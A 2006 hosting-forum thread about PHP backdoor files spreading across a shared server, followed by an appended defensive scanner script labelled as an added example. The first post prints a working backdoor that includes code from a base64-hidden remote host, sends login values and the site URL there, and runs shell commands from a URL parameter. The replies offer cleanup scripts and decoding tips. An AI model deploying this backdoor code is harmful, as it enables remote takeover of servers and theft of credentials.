Web Hosting Talk : Hosting Security and Technology : New Vulnerabilities - Scary PHP Files ALL Over the Server

  #1  
Old 02-08-2006, 11:05 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13

New Vulnerabilities - Scary PHP Files ALL Over the Server


Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here are some examples:

options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php

There's plenty more out there. These files all contain some dirty code...here's an example:

Code:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Not sure exactly what this does, but...

These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

It seems that the last two weeks has seen a HUGE jump in vulnerabilities...

Anyone else seeing this? Any ideas? Please?



  #2  
Old 02-08-2006, 11:34 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.

  #3  
Old 02-09-2006, 12:18 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Here, I wrote this to try to these files quickly...

The only thing it doesn't account for is directories with spaces in the name...

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done
Don't forget to do the updatedb first...and you must run this as root.

If there's a better solution, great...this is the quickest I could come up with.

  #4  
Old 02-09-2006, 12:38 AM
Doctorbob Doctorbob is offline
Disabled
 
Join Date: Dec 2005
Posts: 105
Looks like a gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. Btw, you may try something like this to find exactly what it does.
Code:
<?php
print(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9"));
?>

  #5  
Old 02-09-2006, 12:43 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Yeah, I tried that, got back that it was contacting:

http://bis.iframe.ru/master.php?r_addr=

Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from success of the hack?)

  #6  
Old 02-09-2006, 08:57 AM
ScottJ ScottJ is offline
Web Hosting Master
 
Join Date: Feb 2005
Posts: 1,356
Are you using mod_security?

__________________
Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  #7  
Old 02-09-2006, 09:03 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss)

  #8  
Old 02-09-2006, 02:50 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Oops! Problem in the code...here's a working version.

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done
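The script above relies on `locate` and unquoted word-splitting, so paths with spaces break it, and it keys on a single string (`base64_encode`) that plenty of legitimate code also contains. The following is an added example, not code from the thread or from any of its posters: a POSIX shell scanner that walks the document roots with `find`, scores each `.php` file on several indicators taken from the backdoor sample in post #1 (a `base64_decode(` remote include, `system($_GET`, and a backtick `` `uname -a` ``), checks for the 404 hand-off `.htaccess` mentioned in post #2, and quarantines hits with the same `.hackers` rename the thread uses. The `ErrorDocument 404` form is an assumption, since the post does not quote the `.htaccess` it found; the demo tree, its paths and its sample files are constructed for illustration.

```sh
# Added example, not code from the thread. Defender-side scanner and quarantine step
# for the PHP dropper described in posts #1-#3 and #8: find | read handles paths with
# spaces (the gap the locate-based loop acknowledges), files are scored on several
# indicators from the posted sample rather than one keyword, and the .htaccess 404
# hand-off from post #2 is checked too. All paths and sample files below are
# constructed for the demo. Run the real scan as the owner of the document roots.

# Count how many distinct indicators from the posted backdoor appear in one file:
# a remote include built from base64_decode(), system() fed straight from $_GET,
# and a backtick `uname -a`. Legitimate code rarely has more than one of these.
indicator_count() {
    n=0
    for pat in 'base64_decode(' 'system($_GET' '`uname -a`'; do
        if grep -qF -- "$pat" "$1"; then n=$((n + 1)); fi
    done
    echo "$n"
}

# Print "score<TAB>path" for every .php file under $1 scoring at least $2 (default 2).
# find | read -r with IFS cleared keeps spaces in names intact; newlines in names are
# the one case this still misses.
scan_php() {
    root=$1
    threshold=${2:-2}
    find "$root" -type f -name '*.php' |
    while IFS= read -r f; do
        s=$(indicator_count "$f")
        if [ "$s" -ge "$threshold" ]; then printf '%s\t%s\n' "$s" "$f"; fi
    done
}

# Post #2 says the dropper adds a .htaccess that calls the PHP file on 404. The Apache
# directive for that is ErrorDocument; the post does not quote the file, so the exact
# form matched here is an assumption. Prints "htaccess<TAB>path<TAB>target".
scan_htaccess() {
    find "$1" -type f -name '.htaccess' |
    while IFS= read -r h; do
        t=$(grep -iE '^[[:space:]]*ErrorDocument[[:space:]]+404[[:space:]]+[^[:space:]]+\.php' "$h" | awk '{print $3}')
        if [ -n "$t" ]; then printf 'htaccess\t%s\t%s\n' "$h" "$t"; fi
    done
}

# Rename hits to NAME.hackers, the convention the thread's script uses: Apache stops
# executing them and the evidence stays on disk. Dry run unless $2 is "move".
quarantine() {
    root=$1
    mode=${2:-dry-run}
    scan_php "$root" |
    while read -r score f; do
        if [ "$mode" = move ]; then
            mv -- "$f" "$f.hackers"
            printf 'moved\t%s\n' "$f"
        else
            printf 'would move (score %s)\t%s\n' "$score" "$f"
        fi
    done
}

# Constructed demo tree: a dropper-style options.php in a directory whose name has a
# space, a .htaccess routing 404s to it, and a legitimate config.php that calls
# base64_decode() once. Prints the temp root so the caller can scan and remove it.
build_demo() {
    d=$(mktemp -d)
    g="$d/home/user1/public_html/my gallery"
    mkdir -p "$g" "$d/home/user2/public_html"
    cat > "$g/options.php" <<'EOF'
<?php
error_reporting(0);
if(! @include_once(base64_decode("PLACEHOLDER_NOT_A_REAL_URL") . "&url=")) {
    if(isset($_GET["k"])){system($_GET["k"]);}
    print `uname -a`;
}
?>
EOF
    printf 'ErrorDocument 404 /options.php\n' > "$g/.htaccess"
    cat > "$d/home/user2/public_html/config.php" <<'EOF'
<?php
// legitimate: decodes one stored setting, never touches a shell
$token = base64_decode($settings['token']);
?>
EOF
    echo "$d"
}

# On a real box: scan_php /home; scan_htaccess /home; then quarantine /home move
```

The two-indicator threshold is what keeps `config.php`-style false positives out: a single `base64_decode(` is normal, a remote include plus `system($_GET` in the same file is not. Review the dry-run list before passing `move`, and keep the renamed `.hackers` files for the incident record rather than deleting them.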
